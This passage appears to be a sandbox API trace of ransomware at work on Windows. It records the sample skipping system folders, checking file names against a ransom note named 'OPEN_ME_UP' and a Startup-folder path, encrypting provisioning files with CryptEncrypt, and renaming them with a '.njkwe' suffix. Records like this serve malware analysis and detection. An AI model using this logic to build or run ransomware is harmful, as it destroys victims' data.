(lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\492__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\492__connections_cellular_rural cellular corporation (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.248] GetTickCount () returned 0x11549f6 [0081.248] GetTickCount () returned 0x11549f6 [0081.248] GetTickCount () returned 0x11549f6 [0081.248] GetTickCount () returned 0x11549f6 [0081.248] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.248] GetProcessHeap () returned 0xbe0000 [0081.248] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.248] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2a2, lpOverlapped=0x0) returned 1 [0081.255] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd5e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.255] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2a2, lpOverlapped=0x0) returned 1 [0081.255] GetProcessHeap () returned 0xbe0000 [0081.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.255] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.255] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.256] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.256] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.256] CloseHandle (hObject=0x43c) returned 1 [0081.256] GetProcessHeap () returned 0xbe0000 [0081.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.256] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 206 [0081.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\492__connections_cellular_rural cellular corporation (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\492__Connections_Cellular_Rural Cellular Corporation (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\492__connections_cellular_rural cellular corporation (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.257] GetProcessHeap () returned 0xbe0000 [0081.257] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.257] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911a1852, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911a1852, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911a1852, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="493__C~1.PRO")) returned 1 [0081.257] lstrcmpiW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.257] lstrcmpiW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.257] lstrcmpiW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.257] lstrcmpiW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.257] lstrcmpiW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.257] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml") returned 166 [0081.257] StrStrIW (lpFirst="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.257] lstrcmpW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.257] lstrcmpW (lpString1="493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.257] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\493__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.257] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\493__connections_cellular_suncom (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.257] GetTickCount () returned 0x1154a05 [0081.257] GetTickCount () returned 0x1154a05 [0081.257] GetTickCount () returned 0x1154a05 [0081.257] GetTickCount () returned 0x1154a05 [0081.257] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.258] GetProcessHeap () returned 0xbe0000 [0081.258] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.258] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0081.260] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.260] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28e, lpOverlapped=0x0) returned 1 [0081.260] GetProcessHeap () returned 0xbe0000 [0081.260] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.260] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.260] CloseHandle (hObject=0x43c) returned 1 [0081.260] GetProcessHeap () returned 0xbe0000 [0081.260] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.260] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0081.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\493__connections_cellular_suncom (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\493__Connections_Cellular_SunCom (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\493__connections_cellular_suncom (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.261] GetProcessHeap () returned 0xbe0000 [0081.261] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.261] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911c7ac2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911c7ac2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911c7ac2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2da, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="494__C~1.PRO")) returned 1 [0081.261] lstrcmpiW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.261] lstrcmpiW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.261] lstrcmpiW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.261] lstrcmpiW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.261] lstrcmpiW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.261] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml") returned 172 [0081.261] StrStrIW (lpFirst="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.262] lstrcmpW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.262] lstrcmpW (lpString1="494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.262] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\494__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\494__connections_cellular_t-mobile usa (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.262] GetTickCount () returned 0x1154a05 [0081.262] GetTickCount () returned 0x1154a05 [0081.262] GetTickCount () returned 0x1154a05 [0081.262] GetTickCount () returned 0x1154a05 [0081.262] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.262] GetProcessHeap () returned 0xbe0000 [0081.262] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.262] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0081.264] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.264] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0081.264] GetProcessHeap () returned 0xbe0000 [0081.264] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.264] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.264] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.264] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.264] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.264] CloseHandle (hObject=0x43c) returned 1 [0081.264] GetProcessHeap () returned 0xbe0000 [0081.264] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.264] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\494__connections_cellular_t-mobile usa (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\494__Connections_Cellular_T-Mobile USA (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\494__connections_cellular_t-mobile usa (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.265] GetProcessHeap () returned 0xbe0000 [0081.265] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.265] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911c7ac2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911c7ac2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911c7ac2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="495__C~1.PRO")) returned 1 [0081.265] lstrcmpiW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0081.265] lstrcmpiW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0081.265] lstrcmpiW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0081.265] lstrcmpiW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0081.265] lstrcmpiW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0081.265] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0081.265] StrStrIW (lpFirst="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0081.265] lstrcmpW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.265] lstrcmpW (lpString1="495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0081.265] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\495__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.265] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\495__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.268] GetTickCount () returned 0x1154a15 [0081.268] GetTickCount () returned 0x1154a15 [0081.268] GetTickCount () returned 0x1154a15 [0081.268] GetTickCount () returned 0x1154a15 [0081.268] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.269] GetProcessHeap () returned 0xbe0000 [0081.269] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.269] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1cb, lpOverlapped=0x0) returned 1 [0081.269] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.269] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1cb, lpOverlapped=0x0) returned 1 [0081.270] GetProcessHeap () returned 0xbe0000 [0081.270] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.270] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.270] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.271] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.271] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.271] CloseHandle (hObject=0x43c) returned 1 [0081.271] GetProcessHeap () returned 0xbe0000 [0081.271] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.271] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0081.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\495__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\495__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\495__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.272] GetProcessHeap () returned 0xbe0000 [0081.272] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.272] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911c7ac2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911c7ac2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911c7ac2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="496__C~1.PRO")) returned 1 [0081.272] lstrcmpiW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.272] lstrcmpiW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United 